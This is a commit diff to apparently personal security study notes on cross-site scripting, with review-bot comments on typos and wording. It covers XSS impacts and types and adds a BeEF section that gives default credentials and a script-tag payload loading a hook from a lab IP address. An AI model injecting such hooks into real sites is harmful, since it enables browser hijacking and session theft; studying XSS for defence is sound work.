Commit 86871363 authored by bobloblaw

Update cross-site-scripting.md

parent b1131d3d
+24 −6
# Cross-site-scripting


Cross-site-scripting, or XSS as it is sometimes abbreviated to, is an attack that let's the attacker execute javascript code in the browser of the victim.

###So, what's the worst that can happen?
## So, what's the worst that can happen?
The attacker is probably not that interestd in changing the color or font of the website the victim is visiting. Although s/he could do that. The worst that can happen is probablt the following:

1. Session-hijacking/Cookie theft
1. Complete control over the browser
The attacker can access plugins. Like password managers. The attacker can trick the user into allowing webcam or audio. 

2. Session-hijacking/Cookie theft
This is when the attacker steals the cookie that is saved in the browser. Using this cookie the attacker can log in to the service as the victim, and thereby gain access to his/her account. If the victim is an admin that has extended privileges (uploading code, images, or whatever) this could lead to a compromise of the server itself.

2. Keylogger
3. Keylogger
The attacker can execute a keylogging-script that steals everything the user inputs in the website. This could be used to steal sensitive information, like passwords, credit cards information, chatlogs or whatever the user inputs.

3. Phishing
4. Phishing
The attacker can insert a fake login. Image that you visit a site, and from that site you are able to login using your facebook or google-account. The attacker could spoof that so that when you enter your credencials, they are then sent to the attacker. 


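Review bot: the renumbered list and the fixed `##` heading are good, but the added lines still carry typos that the edit could have caught in passing: "let's the attacker" (lets), "interestd", "probablt", "Image that you visit" (Imagine), "credencials". Separately, item 1 "Complete control over the browser" overstates what an XSS payload gets: the script runs in the context of the vulnerable origin, so it can only reach what that origin can (its cookies not marked HttpOnly, its DOM, same-origin requests, and permission prompts the user accepts). Suggest wording it as "Control over the victim's session in that origin" and keeping the plugin/webcam sentence as the "can also trick the user into ..." caveat it already is.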
@@ -19,7 +23,7 @@ The attacker can insert a fake login. Image that you visit a site, and from that
### Types of XSS

1. Persistent
This is when the malicious code originates from the websites database. That means the attacker has managed to insert malicious code into the databse. So every time the database server that data the script will me executed.
This is when the malicious code originates from the websites database. That means the attacker has managed to insert malicious code into the database. So every time the database serve that data the script will me executed. this is probably the most dangerous XSS, since it does not need to rely on social engineering.

2. Reflected
This is an attack where the script originates from the users request. This might seem a bit illogical, why would a user inject malicious code to himself? Well the code can 
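Review bot: the replacement line fixes "databse" but leaves "So every time the database serve that data the script will me executed" in the same sentence; it should read "serves that data the script will be executed", and "websites database" wants an apostrophe ("website's"). The sentence starting with "this is probably" needs a capital. The added point itself is sound and worth keeping: stored XSS fires for every visitor who loads the page, with no link or lure needed, which is exactly why it is treated as the highest-impact variant.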
@@ -28,6 +32,20 @@ This is an attack where the script originates from the users request. This might
DOM-based attacks are when something is injected into javascript on the DOM. So, it does not go by the server. Because the code gets executed in the response.
Take a search-functionality for example. The users enters a search-parameter that gets sent to the server which might sanitize it or something. In the response the found search-items are sent, but not the search-query. But on the webpage the search query is exposed. "You searched for X" is shown. That is because it gets the search parameter from the url-parameter. By using `document.location.href` for example.

## Beef

Beef username/password: beef:beef
Beef is a great tool for attacking browsers. 

After starting it up you can log in to the panel. Then you get someone to execute the hook.
Hook URL: http://172.17.15.118:3000/hook.js
UI URL:   http://172.17.15.118:3000/ui/panel

By injecting the hook into a XSS. Like this

```javascript
<script src="http://172.17.15.118:3000/hook.js"></script>
```


### How does it really work?
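Review bot: two things in the BeEF section. First, the fenced block is tagged `javascript` but its content is an HTML `<script>` tag, so the fence should be `html` to highlight correctly. Second, `172.17.15.118` and `beef:beef` are a lab-specific address and BeEF's default login; the doc should say so (e.g. "default credentials, change them in config.yaml before exposing the panel" and "replace the IP with your own BeEF host"), otherwise a reader copying the snippet gets a dead hook and a panel anyone on the network can log in to. Also "By injecting the hook into a XSS. Like this" is a fragment; fold it into the previous sentence ("... execute the hook, for example by injecting it through an XSS:").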
@@ -74,7 +92,7 @@ This is a tool found in recon-ng. It basically just check this (https://www.open



#### BeeF XSS


###References:
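Review bot: `###References:` has the same missing-space problem that this commit fixed for "So, what's the worst that can happen?" earlier in the file; without a space after the hashes Markdown renders it as literal text rather than a heading. Suggest `### References` (and dropping the trailing colon, matching the other headings). The `#### BeeF XSS` heading also sits under a section that is otherwise empty in this hunk; if it is a placeholder, a one-line pointer to the "Beef" section above would avoid a dangling header.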